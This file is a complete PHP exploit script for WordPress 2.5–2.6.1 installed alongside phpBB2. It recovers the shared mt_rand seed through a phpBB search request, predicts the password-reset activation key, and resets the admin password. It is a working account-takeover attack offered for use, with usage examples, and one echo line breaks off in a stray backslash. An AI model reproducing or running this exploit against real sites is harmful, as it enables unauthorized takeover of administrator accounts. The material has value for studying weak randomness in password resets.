<?php
echo "------------------------------------------------------------------\n";
echo "Wordpress 2.5 <= 2.6.1 through phpBB2 Reset Admin Password Exploit\n";
echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
echo "------------------------------------------------------------------\n";
if ($_SERVER['argc']<3) {
echo "USAGE:\n";
echo "~~~~~~\n";
echo "php {$_SERVER['argv'][0]} [wp] [phpbb] OPTIONS\n\n";
echo "[wp] - target server where Wordpress is installed\n";
echo "[phpbb] - path to phpBB (must be located on the same server)\n\n";
echo "OPTIONS:\n";
echo "--wp_user=[value] (default: admin)\n";
echo "--search=[value] (default: `site OR file`)\n";
echo "--skipcheck (force exploit not to compare PHP versions)\n";
echo "examples:\n";
echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://site.com/forum/\n";
echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://samevhost.com/forum/ --wp_user=lol\n";
die;
}
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);
$wp = $_SERVER['argv'][1];
$phpbb = $_SERVER['argv'][2];
for($i=3;$i<$_SERVER['argc'];$i++){
if(strpos($_SERVER['argv'][$i],"--wp_user=")!==false) {
list(,$wp_user) = explode("=",$_SERVER['argv'][$i]);
}
if (strpos($_SERVER['argv'][$i],"--search=")!==false) {
list(,$search) = explode("=",$_SERVER['argv'][$i]);
}
if (strpos($_SERVER['argv'][$i],"--skipcheck")!==false) {
$skipcheck=true;
}
}
if(!isset($wp_user))$wp_user='admin';
if(!isset($search))$search='site OR file';
$wp_parts = @parse_url($wp);
$phpbb_parts = @parse_url($phpbb);
if(isset($wp_parts['host']))$wp_ip = gethostbyname($wp_parts['host']);else die("[-] Wrong parameter given\n");
if(isset($phpbb_parts['host']))$phpbb_ip = gethostbyname($phpbb_parts['host']);else die("[-] Wrong parameter given\n");
if($wp_ip!=$phpbb_ip) die("[-] Web apps must be located on the same server\n");
$phpbb_host = $phpbb_parts['host'];
if(isset($phpbb_parts['port']))$phpbb_port=$phpbb_parts['port']; else $phpbb_port=80;
if(isset($phpbb_parts['path']))$phpbb_path=$phpbb_parts['path']; else $phpbb_path="/";
if(substr($phpbb_path,-1,1)!="/")$phpbb_path .= "/";
$wp_host = $wp_parts['host'];
if(isset($wp_parts['port']))$wp_port=$wp_parts['port']; else $wp_port=80;
if(isset($wp_parts['path']))$wp_path=$wp_parts['path']; else $wp_path="/";
if(substr($wp_path,-1,1)!="/")$wp_path .= "/";
echo "[~] Connecting... ";
$sock = fsockopen($phpbb_ip,$phpbb_port);
if(!$sock)die("failed\n"); else echo "OK\n";
$packet = "GET {$wp_path}wp-login.php HTTP/1.0\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$resp='';
fputs($sock,$packet);
while(!feof($sock)) {
$resp.=fgets($sock);
}
fclose($sock);
if(preg_match('@HTTP/1\.(0|1) 200 OK@i',$resp)){
if(preg_match('@login\.css\?ver=([\d\.]+)\'@',$resp)) $wp26=true;
else $wp26=false;
} else die("[-] Can't obtain wp-login.php\n");
if(!isset($skipcheck)) {
echo "[~] Comparing PHP versions... ";
$out=array();
preg_match('@x-powered-by: *PHP/([\d\.]+)@i',$resp,$out);
if(!isset($out[1]))die( "failed\n[-] Can't get PHP version\n");
else {
if(!(version_compare($out[1],'5.2.6') && version_compare(phpversion(),'5.2.6')) && !(!version_compare($out[1],'5.2.6') && !version_compare(phpversion(),'5.2.6')) ) {
die("failed\n[-] Server's and local PHP versions are unacceptable\n");
}
}
echo "OK\n";
}
$ock = fsockopen($phpbb_ip,$phpbb_port);
echo "[~] Sending request to $phpbb\n";
$data = "search_keywords=".urlencode($search)."&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200";
$packet = "POST {$phpbb_path}search.php?mode=results HTTP/1.1\r\n";
$packet.= "Host: {$phpbb_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;
fputs($ock, $packet);
sleep(5);
$resp='';
while(!feof($ock)) {
$resp = fgets($ock);
preg_match('@search.php\?search_id=(\d+)&@',$resp,$search);
if(isset($search[1])) {
$search_id = (int)$search[1];
echo "[+] search_id is $search_id\n";
break;
}
}
if(!isset($search_id)) die("[-] search_id Not Found, try the other --search param\n");
echo "[~] Sending request to $wp\n";
$data = "user_login=".urlencode($wp_user)."&wp-submit=Get+New+Password";
$packet = "POST {$wp_path}wp-login.php?action=lostpassword HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Referer: {$wp}/wp-login.php?action=lostpassword\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;
fputs($ock,$packet);
$seed = search_seed($search_id);
if($seed!==false) echo "[+] Seed is $seed\n";
else die("[-] Seed Not Found\n");
mt_srand($seed);
mt_rand();
if($wp26) $key = wp26_generate_password(20, false);
else $key = wp_generate_password();
echo "[+] Activation key should be $key\
";
echo "[~] Sending request to activate password reset\n";
$packet = "GET {$wp_path}wp-login.php?action=rp&key={$key} HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";
fputs($ock,$packet);
while(!feof($ock)) {
$resp .= fgets($ock);
}
if(preg_match('/(Invalid username or e-mail)|(пользователь отсутствует в базе данных)|(Неправильное имя пользователя)/i',$resp)) die("[-] Incorrect username for wordpress\n");
if(strpos($resp,'error=invalidkey')!==false) die("[-] Activation key is incorrect\n");
if($wp26) $pass = wp26_generate_password();
else $pass = wp_generate_password();
echo "[+] New password should be $pass\n";
function search_seed($rand_num) {
$max = 1000000;
for($seed=0;$seed<=$max;$seed++){
mt_srand($seed);
$key = mt_rand();
if($key==$rand_num) return $seed;
}
return false;
}
function wp26_generate_password($length = 12, $special_chars = true) {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
if ( $special_chars )
$chars .= '!@#$%^&*()';
$password = '';
for ( $i = 0; $i < $length; $i++ )
$password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
return $password;
}
function wp_generate_password() {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$length = 7;
$password = '';
for ( $i = 0; $i < $length; $i++ )
$password .= substr($chars, mt_rand(0, 61), 1);
return $password;
}
?>